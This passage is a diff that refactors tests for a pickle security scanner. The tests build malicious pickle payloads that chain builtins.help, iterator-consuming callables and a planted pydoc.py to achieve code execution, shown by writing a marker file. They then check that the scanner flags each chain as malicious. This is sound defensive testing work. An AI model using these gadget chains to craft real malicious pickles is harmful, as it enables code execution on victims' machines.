marker_content @@ -4359,16 +4062,9 @@ def test_scan_bytes_blocks_builtins_help_singleton_import_rce(tmp_path: Path) -> if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -4591,16 +4287,7 @@ def test_scan_bytes_flags_setstate_import_execution_with_required_state( if not marker.exists(): raise SystemExit("setstate import did not execute") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(tmp_path), str(marker), payload.hex()], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr + _assert_isolated_python(tmp_path, [sys.executable, "-c", child_code, str(tmp_path), str(marker), payload.hex()]) def test_scan_bytes_blocks_iter_callable_sentinel_consumption_rce(tmp_path: Path) -> None: @@ -4661,16 +4348,9 @@ def test_scan_bytes_blocks_iter_callable_sentinel_consumption_rce(tmp_path: Path if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -4737,16 +4417,9 @@ def test_scan_bytes_blocks_next_call_iterator_consumption_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -4819,7 +4492,8 @@ def test_scan_bytes_blocks_deque_call_iterator_consumption_rce( raise SystemExit("marker content mismatch") """ expected_maxlen = "0" if with_maxlen else "None" - result = subprocess.run( + _assert_isolated_python( + tmp_path, [ sys.executable, "-c", @@ -4830,14 +4504,7 @@ def test_scan_bytes_blocks_deque_call_iterator_consumption_rce( marker_content, expected_maxlen, ], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -4921,16 +4588,10 @@ def test_scan_bytes_blocks_builtin_iterable_call_iterator_consumption_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content, expected_repr], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -5013,16 +4674,10 @@ def test_scan_bytes_blocks_join_call_iterator_consumption_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content, expected_repr], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -5086,16 +4741,9 @@ def test_scan_bytes_blocks_bytearray_join_call_iterator_consumption_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -5161,16 +4809,10 @@ def test_scan_bytes_blocks_min_max_call_iterator_consumption_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content, consumer], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -5253,16 +4895,9 @@ def test_scan_bytes_blocks_lazy_wrapper_call_iterator_consumption_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -5348,16 +4983,9 @@ def test_scan_bytes_blocks_itertools_lazy_wrapper_call_iterator_consumption_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -5366,14 +4994,7 @@ def test_scan_bytes_blocks_itertools_product_call_iterator_materialization_rce(t module_dir.mkdir() marker = tmp_path / "itertools_product_call_iterator_marker" marker_content = "pydoc-owned" - (module_dir / "pydoc.py").write_text( - "from pathlib import Path\n" - f"Path({str(marker)!r}).write_text({marker_content!r})\n" - "_values = ['owned-value', 'stop']\n" - "def help(*args, **kwargs):\n" - " return _values.pop(0) if _values else 'stop'\n", - encoding="utf-8", - ) + _write_iterator_pydoc(module_dir, marker, marker_content, "['owned-value', 'stop']") payload = _builtins_help_call_iterator_itertools_product_payload() report = scan_bytes(payload, source="itertools-product-call-iterator-rce.pkl") @@ -5415,16 +5036,9 @@ def test_scan_bytes_blocks_itertools_product_call_iterator_materialization_rce(t if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -5459,14 +5073,7 @@ def test_scan_bytes_blocks_itertools_adapter_next_call_iterator_consumption_rce( module_dir.mkdir() marker = tmp_path / "itertools_adapter_call_iterator_marker" marker_content = "pydoc-owned" - (module_dir / "pydoc.py").write_text( - "from pathlib import Path\n" - f"Path({str(marker)!r}).write_text({marker_content!r})\n" - "_values = ['owned-value', 'b', 'stop']\n" - "def help(*args, **kwargs):\n" - " return _values.pop(0) if _values else 'stop'\n", - encoding="utf-8", - ) + _write_iterator_pydoc(module_dir, marker, marker_content, "['owned-value', 'b', 'stop']") report = scan_bytes(payload, source="itertools-adapter-next-call-iterator-rce.pkl") @@ -5514,16 +5121,10 @@ def test_scan_bytes_blocks_itertools_adapter_next_call_iterator_consumption_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content, expected_repr], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -5747,38 +5348,6 @@ def test_scan_bytes_blocks_stdlib_eager_call_iterator_consumption_rce( expected_repr: str, requires_python_3_11_plus: bool, ) -> None: - module_dir = tmp_path / "modules" - module_dir.mkdir() - marker = tmp_path / "stdlib_eager_call_iterator_marker" - marker_content = "pydoc-owned" - (module_dir / "pydoc.py").write_text( - "from pathlib import Path\n" - f"Path({str(marker)!r}).write_text({marker_content!r})\n" - f"_values = {values_literal}\n" - "def help(*args, **kwargs):\n" - " return _values.pop(0) if _values else 'stop'\n", - encoding="utf-8", - ) - - report = scan_bytes(payload, source="stdlib-eager-call-iterator-rce.pkl") - - assert report.verdict == SafetyVerdict.MALICIOUS - assert _has_critical_call_graph_finding( - report, - "_sitebuiltins", - "_Helper.__call__", - "builtins.__import__", - ) - assert any( - invocation.get("module") == "builtins" - and invocation.get("name") == "help" - and invocation.get("positional_arg_count") == 0 - for invocation in report.metadata.get("callable_invocations", []) - ) - - assert not marker.exists() - if requires_python_3_11_plus and sys.version_info < (3, 11): - return child_code = """ import ast import pickle @@ -5817,17 +5386,16 @@ def test_scan_bytes_blocks_stdlib_eager_call_iterator_consumption_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content, expected_repr], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_eager_call_iterator( + tmp_path, + payload, + values_literal, + expected_repr, + "stdlib_eager_call_iterator_marker", + "stdlib-eager-call-iterator-rce.pkl", + child_code, + requires_python_3_11_plus, ) - assert result.returncode == 0, result.stderr - assert marker.read_text() == marker_content @pytest.mark.parametrize( @@ -5864,49 +5432,16 @@ def test_scan_bytes_blocks_weighted_statistics_call_iterator_consumption_rce( expected_repr: str, requires_python_3_11_plus: bool, ) -> None: - module_dir = tmp_path / "modules" - module_dir.mkdir() - marker = tmp_path / "weighted_statistics_call_iterator_marker" - marker_content = "pydoc-owned" - (module_dir / "pydoc.py").write_text( - "from pathlib import Path\n" - f"Path({str(marker)!r}).write_text({marker_content!r})\n" - f"_values = {values_literal}\n" - "def help(*args, **kwargs):\n" - " return _values.pop(0) if _values else 'stop'\n", - encoding="utf-8", - ) + child_code = """ +import pickle +import sys +from pathlib import Path - report = scan_bytes(payload, source="weighted-statistics-call-iterator-rce.pkl") - - assert report.verdict == SafetyVerdict.MALICIOUS - assert _has_critical_call_graph_finding( - report, - "_sitebuiltins", - "_Helper.__call__", - "builtins.__import__", - ) - assert any( - invocation.get("module") == "builtins" - and invocation.get("name") == "help" - and invocation.get("positional_arg_count") == 0 - for invocation in report.metadata.get("callable_invocations", []) - ) - - assert not marker.exists() - if requires_python_3_11_plus and sys.version_info < (3, 11): - return - - child_code = """ -import pickle -import sys -from pathlib import Path - -module_dir = Path(sys.argv[1]) -marker = Path(sys.argv[2]) -payload = bytes.fromhex(sys.argv[3]) -marker_content = sys.argv[4] -expected_repr = sys.argv[5] +module_dir = Path(sys.argv[1]) +marker = Path(sys.argv[2]) +payload = bytes.fromhex(sys.argv[3]) +marker_content = sys.argv[4] +expected_repr = sys.argv[5] if marker.exists(): raise SystemExit("marker already exists before pickle execution") @@ -5920,17 +5455,16 @@ def test_scan_bytes_blocks_weighted_statistics_call_iterator_consumption_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content, expected_repr], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_eager_call_iterator( + tmp_path, + payload, + values_literal, + expected_repr, + "weighted_statistics_call_iterator_marker", + "weighted-statistics-call-iterator-rce.pkl", + child_code, + requires_python_3_11_plus, ) - assert result.returncode == 0, result.stderr - assert marker.read_text() == marker_content @pytest.mark.parametrize( @@ -6019,7 +5553,8 @@ def test_scan_bytes_blocks_weakref_materializer_call_iterator_consumption_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( + _assert_isolated_python( + tmp_path, [ sys.executable, "-c", @@ -6031,14 +5566,7 @@ def test_scan_bytes_blocks_weakref_materializer_call_iterator_consumption_rce( expected_type, str(expected_len), ], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -6324,76 +5852,15 @@ def test_scan_bytes_blocks_method_descriptor_call_iterator_consumption_rce( values_literal: str, expected_repr: str, ) -> None: - module_dir = tmp_path / "modules" - module_dir.mkdir() - marker = tmp_path / "method_descriptor_call_iterator_marker" - marker_content = "pydoc-owned" - (module_dir / "pydoc.py").write_text( - "from pathlib import Path\n" - f"Path({str(marker)!r}).write_text({marker_content!r})\n" - f"_values = {values_literal}\n" - "def help(*args, **kwargs):\n" - " return _values.pop(0) if _values else 'stop'\n", - encoding="utf-8", - ) - - report = scan_bytes(payload, source="method-descriptor-call-iterator-rce.pkl") - - assert report.verdict == SafetyVerdict.MALICIOUS - assert _has_critical_call_graph_finding( - report, - "_sitebuiltins", - "_Helper.__call__", - "builtins.__import__", - ) - assert any( - invocation.get("module") == "builtins" - and invocation.get("name") == "help" - and invocation.get("positional_arg_count") == 0 - for invocation in report.metadata.get("callable_invocations", []) - ) - - assert not marker.exists() - child_code = """ -import pickle -import sys -from pathlib import Path - -module_dir = Path(sys.argv[1]) -marker = Path(sys.argv[2]) -payload = bytes.fromhex(sys.argv[3]) -marker_content = sys.argv[4] -expected_repr = sys.argv[5] - -if marker.exists(): - raise SystemExit("marker already exists before pickle execution") -sys.path.insert(0, str(module_dir)) -sys.modules.pop("pydoc", None) -result = pickle.loads(payload) -result_repr = repr(result) -expected_ordered_dict_repr = None -if expected_repr.startswith("OrderedDict(") and expected_repr.endswith(")"): - expected_ordered_dict_repr = expected_repr[len("OrderedDict(") : -1] -if result_repr != expected_repr and not ( - type(result).__name__ == "OrderedDict" and repr(dict(result)) == expected_ordered_dict_repr -): - raise SystemExit(f"expected {expected_repr}, got {result!r}") -if not marker.exists(): - raise SystemExit("marker was not written") -if marker.read_text() != marker_content: - raise SystemExit("marker content mismatch") -""" - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content, expected_repr], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_eager_call_iterator( + tmp_path, + payload, + values_literal, + expected_repr, + "method_descriptor_call_iterator_marker", + "method-descriptor-call-iterator-rce.pkl", + _EAGER_CALL_ITERATOR_ORACLE, ) - assert result.returncode == 0, result.stderr - assert marker.read_text() == marker_content def test_scan_bytes_keeps_defaultdict_init_factory_call_iterator_lazy(tmp_path: Path) -> None: @@ -6401,14 +5868,7 @@ def test_scan_bytes_keeps_defaultdict_init_factory_call_iterator_lazy(tmp_path: module_dir.mkdir() marker = tmp_path / "defaultdict_init_factory_call_iterator_marker" marker_content = "pydoc-owned" - (module_dir / "pydoc.py").write_text( - "from pathlib import Path\n" - f"Path({str(marker)!r}).write_text({marker_content!r})\n" - "_values = [('owned-key', 'owned-value'), 'stop']\n" - "def help(*args, **kwargs):\n" - " return _values.pop(0) if _values else 'stop'\n", - encoding="utf-8", - ) + _write_iterator_pydoc(module_dir, marker, marker_content, "[('owned-key', 'owned-value'), 'stop']") payload = _builtins_help_call_iterator_method_descriptor_payload( "collections", "defaultdict.__init__", @@ -6448,16 +5908,7 @@ def test_scan_bytes_keeps_defaultdict_init_factory_call_iterator_lazy(tmp_path: if marker.exists(): raise SystemExit("marker was written") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr + _assert_isolated_python(tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()]) assert not marker.exists() @@ -6550,16 +6001,9 @@ def test_scan_bytes_blocks_weakref_method_descriptor_call_iterator_consumption_r if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -6568,14 +6012,7 @@ def test_scan_bytes_keeps_non_consuming_method_descriptor_call_iterator_lazy(tmp module_dir.mkdir() marker = tmp_path / "method_descriptor_lazy_call_iterator_marker" marker_content = "pydoc-owned" - (module_dir / "pydoc.py").write_text( - "from pathlib import Path\n" - f"Path({str(marker)!r}).write_text({marker_content!r})\n" - "_values = ['owned-key', 'stop']\n" - "def help(*args, **kwargs):\n" - " return _values.pop(0) if _values else 'stop'\n", - encoding="utf-8", - ) + _write_iterator_pydoc(module_dir, marker, marker_content, "['owned-key', 'stop']") payload = _builtins_help_call_iterator_method_descriptor_payload("builtins", "dict.setdefault", b"}", b"h\x00") report = scan_bytes(payload, source="method-descriptor-lazy-call-iterator.pkl") @@ -6607,16 +6044,7 @@ def test_scan_bytes_keeps_non_consuming_method_descriptor_call_iterator_lazy(tmp if marker.exists(): raise SystemExit("marker was written") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr + _assert_isolated_python(tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()]) assert not marker.exists() @@ -6646,76 +6074,15 @@ def test_scan_bytes_blocks_operator_sequence_search_call_iterator_consumption_rc values_literal: str, expected_repr: str, ) -> None: - module_dir = tmp_path / "modules" - module_dir.mkdir() - marker = tmp_path / "operator_sequence_search_call_iterator_marker" - marker_content = "pydoc-owned" - (module_dir / "pydoc.py").write_text( - "from pathlib import Path\n" - f"Path({str(marker)!r}).write_text({marker_content!r})\n" - f"_values = {values_literal}\n" - "def help(*args, **kwargs):\n" - " return _values.pop(0) if _values else 'stop'\n", - encoding="utf-8", - ) - - report = scan_bytes(payload, source="operator-sequence-search-call-iterator-rce.pkl") - - assert report.verdict == SafetyVerdict.MALICIOUS - assert _has_critical_call_graph_finding( - report, - "_sitebuiltins", - "_Helper.__call__", - "builtins.__import__", - ) - assert any( - invocation.get("module") == "builtins" - and invocation.get("name") == "help" - and invocation.get("positional_arg_count") == 0 - for invocation in report.metadata.get("callable_invocations", []) - ) - - assert not marker.exists() - child_code = """ -import pickle -import sys -from pathlib import Path - -module_dir = Path(sys.argv[1]) -marker = Path(sys.argv[2]) -payload = bytes.fromhex(sys.argv[3]) -marker_content = sys.argv[4] -expected_repr = sys.argv[5] - -if marker.exists(): - raise SystemExit("marker already exists before pickle execution") -sys.path.insert(0, str(module_dir)) -sys.modules.pop("pydoc", None) -result = pickle.loads(payload) -result_repr = repr(result) -expected_ordered_dict_repr = None -if expected_repr.startswith("OrderedDict(") and expected_repr.endswith(")"): - expected_ordered_dict_repr = expected_repr[len("OrderedDict(") : -1] -if result_repr != expected_repr and not ( - type(result).__name__ == "OrderedDict" and repr(dict(result)) == expected_ordered_dict_repr -): - raise SystemExit(f"expected {expected_repr}, got {result!r}") -if not marker.exists(): - raise SystemExit("marker was not written") -if marker.read_text() != marker_content: - raise SystemExit("marker content mismatch") -""" - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content, expected_repr], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_eager_call_iterator( + tmp_path, + payload, + values_literal, + expected_repr, + "operator_sequence_search_call_iterator_marker", + "operator-sequence-search-call-iterator-rce.pkl", + _EAGER_CALL_ITERATOR_ORACLE, ) - assert result.returncode == 0, result.stderr - assert marker.read_text() == marker_content def test_scan_bytes_keeps_operator_length_hint_call_iterator_lazy(tmp_path: Path) -> None: @@ -6723,14 +6090,7 @@ def test_scan_bytes_keeps_operator_length_hint_call_iterator_lazy(tmp_path: Path module_dir.mkdir() marker = tmp_path / "operator_length_hint_call_iterator_marker" marker_content = "pydoc-owned" - (module_dir / "pydoc.py").write_text( - "from pathlib import Path\n" - f"Path({str(marker)!r}).write_text({marker_content!r})\n" - "_values = ['owned-value', 'stop']\n" - "def help(*args, **kwargs):\n" - " return _values.pop(0) if _values else 'stop'\n", - encoding="utf-8", - ) + _write_iterator_pydoc(module_dir, marker, marker_content, "['owned-value', 'stop']") payload = _builtins_help_call_iterator_operator_payload("length_hint", b"h\x00") report = scan_bytes(payload, source="operator-length-hint-call-iterator.pkl") @@ -6762,16 +6122,7 @@ def test_scan_bytes_keeps_operator_length_hint_call_iterator_lazy(tmp_path: Path if marker.exists(): raise SystemExit("marker was written") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr + _assert_isolated_python(tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()]) assert not marker.exists() @@ -6894,94 +6245,26 @@ def test_scan_bytes_blocks_operator_protocol_call_iterator_consumption_rce( values_literal: str, expected_repr: str, ) -> None: + _assert_eager_call_iterator( + tmp_path, + payload, + values_literal, + expected_repr, + "operator_protocol_call_iterator_marker", + "operator-protocol-call-iterator-rce.pkl", + _EAGER_CALL_ITERATOR_ORACLE, + ) + + +def test_scan_bytes_keeps_operator_iadd_numeric_receiver_call_iterator_lazy(tmp_path: Path) -> None: module_dir = tmp_path / "modules" module_dir.mkdir() - marker = tmp_path / "operator_protocol_call_iterator_marker" + marker = tmp_path / "operator_iadd_numeric_receiver_marker" marker_content = "pydoc-owned" - (module_dir / "pydoc.py").write_text( - "from pathlib import Path\n" - f"Path({str(marker)!r}).write_text({marker_content!r})\n" - f"_values = {values_literal}\n" - "def help(*args, **kwargs):\n" - " return _values.pop(0) if _values else 'stop'\n", - encoding="utf-8", - ) + _write_iterator_pydoc(module_dir, marker, marker_content, "['owned-value', 'stop']") + payload = _builtins_help_call_iterator_operator_payload("iadd", b"K\x01", b"h\x00") - report = scan_bytes(payload, source="operator-protocol-call-iterator-rce.pkl") - - assert report.verdict == SafetyVerdict.MALICIOUS - assert _has_critical_call_graph_finding( - report, - "_sitebuiltins", - "_Helper.__call__", - "builtins.__import__", - ) - assert any( - invocation.get("module") == "builtins" - and invocation.get("name") == "help" - and invocation.get("positional_arg_count") == 0 - for invocation in report.metadata.get("callable_invocations", []) - ) - - assert not marker.exists() - child_code = """ -import pickle -import sys -from pathlib import Path - -module_dir = Path(sys.argv[1]) -marker = Path(sys.argv[2]) -payload = bytes.fromhex(sys.argv[3]) -marker_content = sys.argv[4] -expected_repr = sys.argv[5] - -if marker.exists(): - raise SystemExit("marker already exists before pickle execution") -sys.path.insert(0, str(module_dir)) -sys.modules.pop("pydoc", None) -result = pickle.loads(payload) -result_repr = repr(result) -expected_ordered_dict_repr = None -if expected_repr.startswith("OrderedDict(") and expected_repr.endswith(")"): - expected_ordered_dict_repr = expected_repr[len("OrderedDict(") : -1] -if result_repr != expected_repr and not ( - type(result).__name__ == "OrderedDict" and repr(dict(result)) == expected_ordered_dict_repr -): - raise SystemExit(f"expected {expected_repr}, got {result!r}") -if not marker.exists(): - raise SystemExit("marker was not written") -if marker.read_text() != marker_content: - raise SystemExit("marker content mismatch") -""" - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content, expected_repr], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr - assert marker.read_text() == marker_content - - -def test_scan_bytes_keeps_operator_iadd_numeric_receiver_call_iterator_lazy(tmp_path: Path) -> None: - module_dir = tmp_path / "modules" - module_dir.mkdir() - marker = tmp_path / "operator_iadd_numeric_receiver_marker" - marker_content = "pydoc-owned" - (module_dir / "pydoc.py").write_text( - "from pathlib import Path\n" - f"Path({str(marker)!r}).write_text({marker_content!r})\n" - "_values = ['owned-value', 'stop']\n" - "def help(*args, **kwargs):\n" - " return _values.pop(0) if _values else 'stop'\n", - encoding="utf-8", - ) - payload = _builtins_help_call_iterator_operator_payload("iadd", b"K\x01", b"h\x00") - - report = scan_bytes(payload, source="operator-iadd-numeric-receiver-call-iterator.pkl") + report = scan_bytes(payload, source="operator-iadd-numeric-receiver-call-iterator.pkl") assert report.verdict == SafetyVerdict.CLEAN assert not any( @@ -7013,16 +6296,7 @@ def test_scan_bytes_keeps_operator_iadd_numeric_receiver_call_iterator_lazy(tmp_ if marker.exists(): raise SystemExit("marker was written") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr + _assert_isolated_python(tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()]) assert not marker.exists() @@ -7031,14 +6305,7 @@ def test_scan_bytes_keeps_operator_iadd_bytearray_receiver_call_iterator_lazy(tm module_dir.mkdir() marker = tmp_path / "operator_iadd_bytearray_receiver_marker" marker_content = "pydoc-owned" - (module_dir / "pydoc.py").write_text( - "from pathlib import Path\n" - f"Path({str(marker)!r}).write_text({marker_content!r})\n" - "_values = [65, 'stop']\n" - "def help(*args, **kwargs):\n" - " return _values.pop(0) if _values else 'stop'\n", - encoding="utf-8", - ) + _write_iterator_pydoc(module_dir, marker, marker_content, "[65, 'stop']") payload = _builtins_help_call_iterator_operator_payload( "iadd", _constructed_call_operand("builtins", "bytearray", b"C\x00"), @@ -7077,16 +6344,7 @@ def test_scan_bytes_keeps_operator_iadd_bytearray_receiver_call_iterator_lazy(tm if marker.exists(): raise SystemExit("marker was written") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr + _assert_isolated_python(tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()]) assert not marker.exists() @@ -7095,14 +6353,7 @@ def test_scan_bytes_keeps_operator_iconcat_userlist_receiver_call_iterator_lazy( module_dir.mkdir() marker = tmp_path / "operator_iconcat_userlist_receiver_marker" marker_content = "pydoc-owned" - (module_dir / "pydoc.py").write_text( - "from pathlib import Path\n" - f"Path({str(marker)!r}).write_text({marker_content!r})\n" - "_values = ['owned-value', 'stop']\n" - "def help(*args, **kwargs):\n" - " return _values.pop(0) if _values else 'stop'\n", - encoding="utf-8", - ) + _write_iterator_pydoc(module_dir, marker, marker_content, "['owned-value', 'stop']") payload = _builtins_help_call_iterator_operator_payload( "iconcat", _constructed_call_operand("collections", "UserList"), @@ -7141,16 +6392,7 @@ def test_scan_bytes_keeps_operator_iconcat_userlist_receiver_call_iterator_lazy( if marker.exists(): raise SystemExit("marker was written") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr + _assert_isolated_python(tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()]) assert not marker.exists() @@ -7159,14 +6401,7 @@ def test_scan_bytes_keeps_operator_ior_counter_receiver_call_iterator_lazy(tmp_p module_dir.mkdir() marker = tmp_path / "operator_ior_counter_receiver_marker" marker_content = "pydoc-owned" - (module_dir / "pydoc.py").write_text( - "from pathlib import Path\n" - f"Path({str(marker)!r}).write_text({marker_content!r})\n" - "_values = [('owned-key', 1), 'stop']\n" - "def help(*args, **kwargs):\n" - " return _values.pop(0) if _values else 'stop'\n", - encoding="utf-8", - ) + _write_iterator_pydoc(module_dir, marker, marker_content, "[('owned-key', 1), 'stop']") payload = _builtins_help_call_iterator_operator_payload( "ior", _constructed_call_operand("collections", 